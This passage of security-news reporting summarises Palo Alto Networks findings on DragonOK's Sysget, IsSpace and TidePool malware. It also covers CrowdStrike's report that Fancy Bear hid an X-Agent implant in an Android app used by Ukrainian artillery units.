The Sysget malware was delivered both directly via phishing emails, as well as in RTF documents triggering the CVE-2015-1641 flaw that in turn leveraged a unique shellcode. The experts observed three distinct new versions of Sysget malware that were improved to make harder the detection and the analysis by security solutions.

PaloAlto also observed DragonOK hackers using other two families malware, the IsSpace and TidePool.

DragonOK

“IsSpace” is an evolution of the NFlog backdoor used by both DragonOK and Moafee. The second malware TidePool was observed earlier this year in targeted attacks powered by a different Chinese APT group, dubbed Operation Ke3chang.

Back in 2013, the security researchers at FireEye spotted a group of China-Linked hackers that conducted an espionage campaign on foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ the same threat actors were spotted targeting personnel at Indian embassies across the world earlier this year.

DragonOK now used the TidePool malware in targeted attacks against organizations in Russia and Tibet.

The analysis published by Palo Alto Networks researchers included links between the C&C domains of the various malware used by the DragonOK (i.e. TidePool, IsSpace and Sysget), and other Indicators of Compromise.

“The DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively developed to make detection and analysis more difficult. Additionally, they appear to be using additional malware toolsets such as TidePool.” states Palo Alto Networks. “While Japan is still the most-targeted region by this group, they look to be seeking out victims in other regions as well, such as Taiwan, Tibet, and Russia.”


Fancy Bear APT tracked Ukrainian artillery units with an Android implant
22.12.2016 securityaffairs
APT

The Russian APT group Fancy Bear used a malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016.
The popular hacking group, known as Fancy Bear, APT 28, Pawn Storm, Sednit or Sofacy, is once again in the headlines. Experts from the cyber security firm CrowdStrike reported the alleged Russian nation-state actor used malware implant on Android devices to track and target Ukrainian artillery units from late 2014 through 2016.

The malicious code was used by spy on target communication and retrieve locational data of the Ukrainian artillery units, this information would have likely been used by pro-Russian separatists fighting in eastern Ukraine to launch attacks against Ukrainian units. Late in the summer of 2016, researchers from CrowdStrike Intelligence began investigating a curious Android Package (APK) named ‘Попр-Д30.apk’ (MD5: 6f7523d3019fa190499f327211e01fcb). The APK contains a number of Russian language artifacts that were military in nature. Hackers used an implant for a legitimate app, but there is no evidence the application was made available in the Android app store.

“From late 2014 and through 2016, FANCY BEAR X-Agent implant was covertly distributed on Ukrainian military forums within a legitimate Android application developed by Ukrainian artillery officer Yaroslav Sherstuk.” states the report published by Crowdstrike. “The original application enabled artillery forces to more rapidly process targeting data for the Soviet-era D-30 Howitzer employed by Ukrainian artillery forces reducing targeting time from minutes to under 15 seconds. According to Sherstuk’s interviews with the press, over 9000 artillery personnel have been using the application in Ukrainian military.”

Ukrainian artillery units app track

“Initial research identified that the filename suggested a relationship to the D-30 122mm towed howitzer, an artillery weapon first manufactured in the Soviet Union in the 1960s but still in use today.” states the report.

If the analysis published by the experts it correct, it means that the Kremlin military strategy made a large use of hacking campaigns to influence internal affairs of foreign governments and to support military operations.

Experts believe the Fancy Bear hacker group operates on behalf of the Russia’s military intelligence agency, GRU. According to the US intelligence, the group was responsible for hacks during the 2016 Presidential Election, its hacking operations aimed to support Donald Trump.

Russia has repeatedly denied hacking accusations.

The malicious code developed by Fancy Bear to track Ukrainian artillery units has many similarities with the one used in the hack of the Democratic National Committee.

Is the malicious implant effective?

According to open source data cited in the report, Ukrainian artillery forces have lost over 50% of their weapons in the 2 years of conflict and over 80% of D-30 howitzers. This represents the highest percentage of loss of any other Ukrainian artillery units.

One aspect very interesting of the story is the implant, an unseen variant of the X-Agent. The use of a malware with its characteristic demonstrates “FANCY BEAR’s expansion in mobile malware development from iOS-capable implants to Android devices”

Further details are available on the CrowdStrike report.